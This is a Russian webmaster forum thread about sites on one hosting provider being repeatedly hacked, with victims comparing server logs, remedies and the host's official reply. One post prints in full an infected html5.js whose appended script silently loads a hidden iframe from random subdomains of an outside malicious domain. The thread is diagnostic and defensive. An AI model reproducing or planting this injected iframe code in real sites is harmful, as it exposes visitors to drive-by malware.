- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Нет IP разный. Хостлайф .
Я имел ввиду, что мне этот же ip два раза скрипт правил.
Тот же хостинг, сайт на голом html, правят jquery-1.6.js, после того как написал в поддержку вроде больше не правили файл, когда гугл пометил сайт как вреодносный было видно что соседи на ip тоже заражены и много.
Я имел ввиду, что мне этот же ip два раза скрипт правил.
.
Это IP яндекс бота, уже написал им в саппорт. Разбираются.
Профи что можно сказать по этим логам
89.248.238.112 - - [31/Aug/2013:22:43:44 +0200] "GET /templates/site2/js/html5.js HTTP/1.1" 200 660 "" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/21.0.1"
89.248.238.112 - - [31/Aug/2013:22:43:47 +0200] "GET /sysmetvpn.php HTTP/1.1" 500 261 "" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/21.0.1"
89.248.238.112 - - [31/Aug/2013:22:43:48 +0200] "POST /sysmetvpn.php HTTP/1.1" 200 405 "" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/21.0.1"
89.248.238.112 - - [31/Aug/2013:22:43:52 +0200] "GET /templates/site2/js/html5.js HTTP/1.1" 200 993 "" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/21.0.1"
Проблема в самом файле html5.js или вприципе без разницы куда прописать?
Вот сождержание html5.js
// Create new HTML5 elements ===================================================
// -----------------------------------------------------------------------------
// This script should load before any others. We want the new elements to be
// parsed before pretty much anything happens.
// Plus, IE does not behave otherwise. The cost of being progressive...
// -----------------------------------------------------------------------------
document.createElement("article");
document.createElement("aside");
document.createElement("audio");
document.createElement("canvas");
document.createElement("command");
document.createElement("datalist");
document.createElement("details");
document.createElement("embed");
document.createElement("figcaption");
document.createElement("figure");
document.createElement("footer");
document.createElement("header");
document.createElement("hgroup");
document.createElement("keygen");
document.createElement("mark");
document.createElement("meter");
document.createElement("nav");
document.createElement("output");
document.createElement("progress");
document.createElement("rp");
document.createElement("rt");
document.createElement("ruby");
document.createElement("section");
document.createElement("source");
document.createElement("summary");
document.createElement("time");
document.createElement("video");;var ifauZp = document.createElement('iframe');ifauZp.name = 'ifauZp';ifauZp.src = 'http://'+genstrdom(Math.floor(Math.random() * 20) + 5)+'.'+'autopridan.ru/';ifauZp.style.width = '0px';ifauZp.style.height = '0px';window.onload = function() {document.cookie = 'chcook=yes; path=/; expires=Wednesday, 18-May-33 03:33:20 GMT'; if ((document.cookie.indexOf('ifauZp=') == -1) && (document.cookie.indexOf('chcook=') != -1)) { document.getElementsByTagName('body')[0].appendChild(ifauZp);var expiresDate = new Date(); expiresDate.setTime(expiresDate.getTime() + 432000000);setTimeout(function() { document.cookie = 'ifauZp=yes; path=/; expires=' + expiresDate; }, 5000);}};function genstrdom(length) {var st = '';var chars = 'abcdefghijklmnopqrstuvwxyz0123456789';for (i=1;i<length;i++) {var c = Math.floor(Math.random()*chars.length + 1);st += chars.charAt(c)}return st;}
Ну судя по всему sysmetvpn.php зловред который вписывает код в html5.js вот и все.
Самое что интересное почти всем подобный зловред и пишется на хостлайфе
Эээх, здравствуйте, коллеги по несчастью!
По личному опыту могу сказать, что обсуждаемому здесь хостеру его вину Вы не докажете и он никогда ее не признает. У меня сложилось впечатление, что за серверами вообще не следят, либо присматривают студенты, которые еще не все про компьютеры знают. Некоторое время назад пытался поднять волну на форуме хостлайфа (тему можете найти, называется редиректы), да никто не поддержал, а я переехав на другой сервер хостлайфа на некоторое время (до сего момента) забыл про взлом. Вот и сейчас все сайты снова заражены, но уже по новому. Сегодня чистил один сайт, не прошло и нескольких часов с момента чистки, как Яша снова нашел js. Печально, это...
Если взломы еще продолжаются, то передайте хостеру чтобы изменил пароли администраторов на серверах, обновил биллинг и панель ispmanager до последней стабильной версии.
Вредоносный код добавляется только к js файлам которые используются на сайте.
Пока хостер не принял меры можно закрыть от записи(права 444) js-файл в который добавляется код.
Боты пока не проверяют и не изменяют права файлов.
Если есть доступ через ssh можно найти все зараженные файлы командой
Взломы не "еще продолжаются", а в рамках хостлайфа "только начались" и полагаю понадобится уйма времени, на осознание проблемы, ибо тот кардон из саппорта начального уровня, через который приходится пробиваться даже и мысли допустить не может о возможности проблемы на стороне хостера - не может быть по определению, так сказали старшие. Когда я демонстрировал видеозапись редиректа (предыдущая проблема) в подлинности видео сомнения не было, а происхождение проблемы сразу же объяснилось зараженностью моего компьютера и всех других дивайсов, включая не рутованные андроид устройства, т.к. другого быть не может. Вот и сейчас смотрю вконтакте удалили ссылу на серч и объяснили все как обычно дырявостью всех кроме себя.
В таком случае лучше сменить хостера, чтобы не терять трафик. Тем более выбор более чем достаточный /ru/forum/development/hosting
Вот еще официальный ответ Хостлайфа:
Хостинг-провайдер ********:
Уважаемые пользователи, ни о каких массовых заражениях серверов хостинга речи не идет и быть не может. Заражают скрипты клиентов через уязвимостей в самих же скриптах - все, как всегда, только в этот раз - гораздо масштабнее, чем обычно.
Да, проблема действительно массовая, мы этого не отрицаем,
Да, мы принимаем определенные меры по ее решению, и профилактике.
В ближайшее время предоставим более развернутую информацию, а пока попрошу воздержаться от излишнего флуда.
Был их клиентом с 2009 года, почти все сайты у них держал, но последний год отнял не один год жизни....
Та же история, что и у Sergsap - сначала редиректы, потом .js, теперь - и то, и другое... Неоднократно обращался к Ai-Bolit, менял пароли, проставлял права на файлы, анализировал логи, переписывался с сапортом, сканировал, потом переписка с Яндексом о разблокировке..... НАДОЕЛО!
Есть несколько сайтов на HC.ru - с ними почему-то ничего такого не происходит, хотя и КМС та же, и "популярные скрипты"... а всё что на хостлайфе - всё рано или поздно взламывается, заражается....
Чем ждать, пока они примут "определенные меры", проще сменить хостера, чем думаю и заняться в ближайшее время